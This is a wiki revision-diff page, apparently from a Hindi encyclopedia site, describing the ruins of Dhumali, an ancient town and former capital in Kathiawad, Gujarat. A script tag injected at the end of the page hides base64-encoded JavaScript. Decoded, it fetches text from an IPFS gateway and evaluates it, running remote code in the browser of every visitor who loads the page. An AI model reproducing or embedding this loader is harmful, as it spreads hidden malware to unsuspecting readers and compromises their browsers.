Difference between revisions of "धुमली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 3: Line 3:
 
*नवानगर से दक्षिण की ओर माणवड़ से 4 मील दूर इस नगर के भग्नावशेष स्थित हैं।
 
*नवानगर से दक्षिण की ओर माणवड़ से 4 मील दूर इस नगर के भग्नावशेष स्थित हैं।
 
*धुमली का एक भाग पर्वत शिखर पर बसा हुआ था, जहाँ एक भग्न दुर्ग आज भी दिखाई देता है।
 
*धुमली का एक भाग पर्वत शिखर पर बसा हुआ था, जहाँ एक भग्न दुर्ग आज भी दिखाई देता है।
*यहाँ के खंडहरों में [[नवलखा मन्दिर]] स्थित है, जो दूर-दूर तक प्रसिद्ध है।
+
*यहाँ के खंडहरों में 'नवलखा मन्दिर' स्थित है, जो दूर-दूर तक प्रसिद्ध है।
 
*पर्वत शिखर तक जाने वाले मार्ग में भी और भी कई जीर्ण-शीर्ण मंदिर दिखाई देते हैं।
 
*पर्वत शिखर तक जाने वाले मार्ग में भी और भी कई जीर्ण-शीर्ण मंदिर दिखाई देते हैं।
  

Latest revision as of 11:08, 18 June 2012

dhumali kathiyava d, gujarat ki ek prachin nagar thi. yah bhootapoorv navanagar riyasat ki prachin rajadhani ke roop mean prasiddh thi.[1]

  • navanagar se dakshin ki or manav d se 4 mil door is nagar ke bhagnavashesh sthit haian.
  • dhumali ka ek bhag parvat shikhar par basa hua tha, jahaan ek bhagn durg aj bhi dikhaee deta hai.
  • yahaan ke khandaharoan mean 'navalakha mandir' sthit hai, jo door-door tak prasiddh hai.
  • parvat shikhar tak jane vale marg mean bhi aur bhi kee jirn-shirn mandir dikhaee dete haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 467 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>